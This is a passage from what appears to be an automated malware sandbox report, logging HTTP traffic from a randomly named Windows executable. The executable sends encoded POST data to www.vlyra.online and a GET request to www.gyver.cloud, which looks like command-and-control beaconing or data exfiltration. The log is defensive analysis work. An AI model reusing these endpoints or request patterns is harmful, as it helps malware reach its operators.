                                                                                  Data Ascii: Z96f5lWrqTeqdCWCVXxr4K944RBNf71NyXYHF2rRWNFcWtlCa2+z7YbDXCUtP5dwRgQl1MBLuvStkXPsCuLMhEcrSBgreU5vIOwPI/F3VkualvE4GHJWfm6Zr9UGNCdHaPpdvzdewXDwBpeld0BG7cTd7amBZb/O2aN6TMEbD8MgNOq2vWhW/gdUIAmjceVcdNlcz5a+n6sJZoPMJdzJ7LKFwhDz2aFg1De6A2Yt/9mpECBuicl
                                                                                  Aug 27, 2024 17:46:56.593945026 CEST2578OUTData Raw: 53 4e 4e 6e 4e 4e 57 62 44 6d 30 68 66 4a 73 37 51 75 53 62 4f 45 30 65 77 46 37 4c 65 6f 70 6d 55 41 64 63 47 36 67 30 78 52 30 59 4c 52 4e 71 52 44 61 59 6f 48 57 74 71 61 70 6a 79 75 72 58 52 58 52 35 33 35 41 38 71 63 4c 68 4f 4e 71 58 4e 7a
                                                                                  Data Ascii: SNNnNNWbDm0hfJs7QuSbOE0ewF7LeopmUAdcG6g0xR0YLRNqRDaYoHWtqapjyurXRXR535A8qcLhONqXNzaVP9MuIwEpuyvN8ntT9YPJZCFKsI/3eVyWI+tdE1zOzaochDNnTEIlaROxvyO+4Ol6Va1y2Egvxai0ClwZJVibPgLSSGFcbuwQjdRMSsk0mD2FRJ8M5OOLsOVLHmsbOKUcvlDUS23MEQrZPYC+tgxgF2fqQqZOgk6
                                                                                  Aug 27, 2024 17:46:56.594110012 CEST5156OUTData Raw: 5a 55 2f 56 49 37 54 76 5a 46 68 77 72 79 69 65 51 4f 42 32 6c 6a 71 59 65 4d 47 73 77 55 6e 74 61 36 46 66 47 39 42 6c 76 55 71 4a 52 4f 62 32 6e 71 33 72 36 54 68 69 78 6e 4b 54 34 61 6a 4a 76 6f 4a 53 6d 47 65 43 68 4a 34 56 42 57 2f 59 65 6f
                                                                                  Data Ascii: ZU/VI7TvZFhwryieQOB2ljqYeMGswUnta6FfG9BlvUqJROb2nq3r6ThixnKT4ajJvoJSmGeChJ4VBW/YeoS3FGx8eJo6PNFw6tGG5Zyf/meMQjs7f1NCpGKxQr9FOG/UrOwUkSdamY9yvYmsZa545uJXlj9u1Bdb3CjuA1ggI8fo4jeX3pPwwigzHe72AXABzH0zVkwMtVZy+02yQQgQm5v6ZvilqAXXHBVDoSgl191Wa0kzJxu


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.11.204981176.223.67.189805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:46:59.029607058 CEST524OUTGET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.gyver.cloud
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:46:59.134354115 CEST397INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Tue, 27 Aug 2024 15:46:59 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 257
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 76 4c 4c 4c 62 4f 68 3d 64 66 79 38 37 61 66 54 43 35 35 59 56 76 7a 53 37 53 31 6a 77 4c 67 63 62 69 35 77 33 4a 48 7a 6a 61 76 61 78 44 51 61 31 39 64 42 30 33 6a 51 73 6b 59 43 41 38 72 2f 37 61 6e 42 42 2b 76 6f 75 54 2b 56 35 61 78 2b 58 6a 47 6b 75 52 48 73 36 75 73 34 42 63 42 46 51 66 58 4b 64 7a 4a 37 6a 31 54 6a 38 5a 47 4d 37 4a 6e 34 59 65 6c 45 46 36 46 31 35 66 51 3d 26 37 52 42 3d 36 36 6e 50 79 4c 47 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.11.2049812203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:04.502994061 CEST788OUTPOST /evtw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Origin: http://www.vlyra.online
                                                                                  Referer: http://www.vlyra.online/evtw/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 5a 4c 2b 73 41 33 4a 65 76 79 76 67 6f 78 66 49 36 51 62 73 44 34 56 59 30 5a 75 52 73 32 67 6e 6f 47 38 74 62 53 77 4e 69 44 64 53 72 4b 69 68 62 62 31 34 72 65 47 63 76 72 39 34 62 45 72 5a 53 32 6f 6c 59 7a 31 61 79 41 58 4d 6a 66 74 6c 48 56 57 66 74 6a 73 78 79 59 57 56 38 2f 66 79 57 67 71 65 41 45 38 7a 2f 77 73 41 6c 66 77 6c 67 51 39 77 47 57 7a 6e 73 6a 47 50 7a 59 79 58 6c 49 71 38 35 62 36 4b 34 4f 47 50 64 4b 6b 68 41 48 61 6e 50 54 2b 74 47 36 73 78 36 4f 54 4e 6e 36 36 51 37 74 74 57 46 31 4c 62 5a 31 2f 6f 79 4e 39 6c 59 67 3d 3d
                                                                                  Data Ascii: AvLLLbOh=nOj0c4YacT1DZL+sA3JevyvgoxfI6QbsD4VY0ZuRs2gnoG8tbSwNiDdSrKihbb14reGcvr94bErZS2olYz1ayAXMjftlHVWftjsxyYWV8/fyWgqeAE8z/wsAlfwlgQ9wGWznsjGPzYyXlIq85b6K4OGPdKkhAHanPT+tG6sx6OTNn66Q7ttWF1LbZ1/oyN9lYg==
                                                                                  Aug 27, 2024 17:47:04.678139925 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:47:04 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:04.678248882 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                  Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                                                  Aug 27, 2024 17:47:04.678263903 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                                                  Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                                                  Aug 27, 2024 17:47:04.678479910 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                                                  Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                                                  Aug 27, 2024 17:47:04.678580999 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                  Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                  Aug 27, 2024 17:47:04.678716898 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                  Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                  Aug 27, 2024 17:47:04.678832054 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                  Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                  Aug 27, 2024 17:47:04.678900003 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                  Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                  Aug 27, 2024 17:47:04.678982973 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                                                  Aug 27, 2024 17:47:04.679176092 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                                                  Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                                                  Aug 27, 2024 17:47:04.844007969 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                                                  Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.11.2049813203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:47:07.204485893 CEST1128OUTPOST /evtw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Origin: http://www.vlyra.online
                                                                                  Referer: http://www.vlyra.online/evtw/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 45 6e 72 6e 4d 74 61 51 55 4e 68 44 64 53 79 36 69 67 56 37 31 6e 72 65 4c 72 76 71 42 34 62 41 44 5a 44 56 67 6c 4d 54 31 64 71 77 58 4e 6b 66 73 69 57 46 57 76 74 69 51 48 79 61 71 56 39 50 7a 79 58 6c 65 65 4b 78 49 30 70 67 73 47 30 50 77 6d 31 67 39 58 47 57 2b 55 73 6e 43 31 7a 75 61 58 6c 72 53 38 72 4c 36 4c 74 4f 48 48 66 4b 6c 4d 52 69 79 75 45 52 65 36 41 39 55 34 31 72 47 30 6d 72 71 53 33 4f 52 62 54 46 71 67 56 30 79 2f 33 74 4d 64 4e 4d 4e 6c 43 5a 4e 45 32 32 63 4b 39 71 50 69 73 62 6b 4e 73 5a 39 62 77 6e 4c 51 4a 4d 32 4c 65 4e 63 34 53 31 55 2b 42 59 7a 4d 47 4c 53 32 72 38 47 6b 75 6d 68 43 30 52 58 6c 33 54 48 32 71 42 52 47 47 50 78 6e 66 35 2f 53 65 44 7a 53 6f 49 57 4e 38 35 57 34 4f 66 49 56 75 38 6f 56 61 74 33 6f 36 47 45 73 33 4f 53 56 71 64 65 72 35 37 77 55 4b 4c 58 69 2b 4c 4d 58 4d 6a 54 63 74 75 7a 42 37 6c 35 30 6d [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFEnrnMtaQUNhDdSy6igV71nreLrvqB4bADZDVglMT1dqwXNkfsiWFWvtiQHyaqV9PzyXleeKxI0pgsG0Pwm1g9XGW+UsnC1zuaXlrS8rL6LtOHHfKlMRiyuERe6A9U41rG0mrqS3ORbTFqgV0y/3tMdNMNlCZNE22cK9qPisbkNsZ9bwnLQJM2LeNc4S1U+BYzMGLS2r8GkumhC0RXl3TH2qBRGGPxnf5/SeDzSoIWN85W4OfIVu8oVat3o6GEs3OSVqder57wUKLXi+LMXMjTctuzB7l50mJXpIPXx+NoPpdKKmYnXOzBHPFoIGPj7xkimuoHzUy7Ho3tFDeepRmSPuUpbt7VbKn8Ogd6bnOa0ndxaLQqBDmfVz/kEkyniNiupr6Ev8NZDMqL+Gd14NM+me2buDTZzNccPMjcbJixQN1oMSvPMRSPf02KJ56gOjfKJYZCIuORQ0k5+vmCh7VnBePXJEMhfVWqqaCXg9t/dlJg=
                                                                                  Aug 27, 2024 17:47:07.385747910 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:47:07 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Aug 27, 2024 17:47:07.385869026 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                                                  Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                                                  Aug 27, 2024 17:47:07.385884047 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                                                  Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                                                  Aug 27, 2024 17:47:07.386014938 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                                                  Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                                                  Aug 27, 2024 17:47:07.386125088 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                                                  Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                                                  Aug 27, 2024 17:47:07.386140108 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                                                  Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                                                  Aug 27, 2024 17:47:07.386253119 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                                                  Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                                                  Aug 27, 2024 17:47:07.386360884 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                                                  Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                                                  Aug 27, 2024 17:47:07.386451006 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
